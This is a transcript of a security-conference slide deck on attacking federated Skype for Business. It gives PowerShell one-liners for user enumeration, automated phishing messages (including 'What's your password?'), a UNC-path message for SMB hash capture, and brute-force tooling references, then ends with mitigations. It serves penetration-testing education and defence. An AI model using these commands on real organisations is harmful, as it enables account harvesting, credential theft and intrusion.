It's just Skype for Business - THOTCON
Download as PPTX, PDF
0 likes406 views
Many organizations are turning to Microsoft to help with their internal communication needs, and some are exposing themselves to external attacks by federating their Skype for Business (formerly Lync) deployments. Federation allows organizations to talk to other external Skype users, but do they really need to? In this talk, we'll go over how you can use the Lync SDK (and a federated account) to automate attacks against federated Skype for Business deployments. We will start with user enumeration and social engineering recon, move on to some password brute force attacks, and wrap things up by automating Skype phishing attacks.
It's just Skype for Business - THOTCON
- 1. Nothing Personal, It's Just Skype for Business Karl Fosaaen
- 2. Introductions Who am I? Karl Fosaaen What do I do? Wear lots of hats Pen Testing Password Cracking Social Engineering Blog DEF CON Swag Goon Pinball Repair
- 3. Overview Introduction to Skype for Business Email Validation and Social Engineering Recon Password Brute Force Attacks Skype Message Phishing Attack Mitigations Questions
- 4. Introduction to Skype for Business
- 5. Introduction to Skype for Business Its Skype, but for Businesses IM/Video/Phone File/Screen Sharing Integrates with Outlook Previously: Office Communicator Lync
- 6. Skype for Business Skype Federation Allows cross-domain communications Pretty common Can be limited by domain Trusted Domains Blocked List
- 7. Skype for Business Identifying Federated Domains Have a Federated account Try to send a message
- 8. Setting Up Your Test Environment
- 9. Setting Up Your Test Environment Basic Overview Buy/Have a domain Set up/Purchase Skype for Business Services Install Skype for Business Client Install Lync 2013 SDK Get the PowerSkype PowerShell Module
- 10. Setting Up Your Test Environment Get hosted Office365 services Or set up your own server (not recommended)
- 11. Setting Up Your Test Environment Set up your user and enable federation
- 12. Setting Up Your Test Environment Install Skype for Business and the Lync SDK Extract the install package and manually run the installer to bypass VS version warning https://www.microsoft.com/en-us/download/details.aspx?id=36824
- 13. Setting Up Your Test Environment Login to Skype for Business as your user
- 14. Setting Up Your Test Environment Grab the PowerShell module from NetSPIs GitHub https://github.com/NetSPI/PowerShell/blob/master/Power Skype.ps1
- 15. Email Validation and Social Engineering Recon
- 16. Email Validation and SE Recon What do we need? Potentially valid email addresses How do we get them? One of the many recon frameworks LinkedIn Google
- 17. Email Validation and SE Recon We could just open up individual chats
- 18. Email Validation and SE Recon Lets just wrap it with PowerShell instead Get-SkypeStatus -inputFile test_emails.txt | ft -AutoSize
- 19. Email Validation and SE Recon
- 20. Email Validation and SE Recon - Demo Demo Get-SkypeStatus -inputFile "C:TempLiveAdmins.txt" | ft -AutoSize -inputFile = Administrator accounts from Alexa top domains It helps if we run it a couple of times
- 21. Email Validation and SE Recon
- 22. Password Brute Force Attacks
- 23. Password Brute Force Attacks Pros: Internet facing Single Factor (Usually) No MFA support in Lync 2013 or On-Premise Skype for Business Off by default in Office365 Domain login Federation is not required to do this Cons: Not easy with the Lync SDK Nyxgeek has some great methods that Ive started to add to PowerSkype Edge cases are fun
- 24. Password Brute Force Attacks Go Watch @nyxgeeks DerbyCon talk https://www.youtube.com/watch?v=v0NTaCFk6VI Check out LyncSniper https://github.com/mdsecresearch/LyncSniper
- 25. Password Brute Force Attacks Attacking with PowerSkype Default Skype/Lync HTTP-NTLM authentication prompts Prerequisites: Standardized deployment with easy to identify authentication endpoints Known domain name example.com may have CORP as their alternate internal domain This can also be pulled from the HTTP-NTLM auth endpoint (nmap) https://nmap.org/nsedoc/scripts/http-ntlm- info.html
- 27. Skype Message Phishing Case Study Sent fake update message User runs update payload Access to users desktop via payload Local administrator rights Cached Domain Admin creds Cracked mscachev2 Domain Admin access to domain controllers
- 28. Skype Message Phishing Send-SkypeMessage -email test@example.com -message "What's your password?" Get-SkypeStatus -inputFile 'C:Emails.txt' | Select Email,Status | where Status -Match "Available" | select Email | Send-SkypeMessage
- 29. Skype Message Phishing - Demo Demo Get-SkypeStatus -email karl.fosaaen@netspi.com Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello from THOTCON" for ($i = 0; $i -lt 10; $i++){Invoke- SendSkypeMessage -email karl.fosaaen@netspi.com -message "Hello $i"}
- 31. Skype Message Phishing Other Options Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "192.168.1.123test SMB capture/relay running on internal network UNC works on internal, hrefs work for external Send this message out to a group, get or relay hashes
- 32. Further Work / Fun Scenarios Grab a domains worth of phone numbers Get-SkypeContacts Should work if you already have creds
- 33. Further Work / Fun Scenarios Party Line Invoke-SendGroupSkypeMessage Or just start a group call (with acquired creds)
- 34. Further Work / Fun Scenarios Keep tabs on Statuses Watch the status of a group (SOC Admins) Respond accordingly (Start your attack) Out of Office is handy for onsite SE
- 36. Attack Mitigations Limit federation to trusted domains Limit domain authentication surface area Monitor your endpoints Enforce strong password requirements User education/Security awareness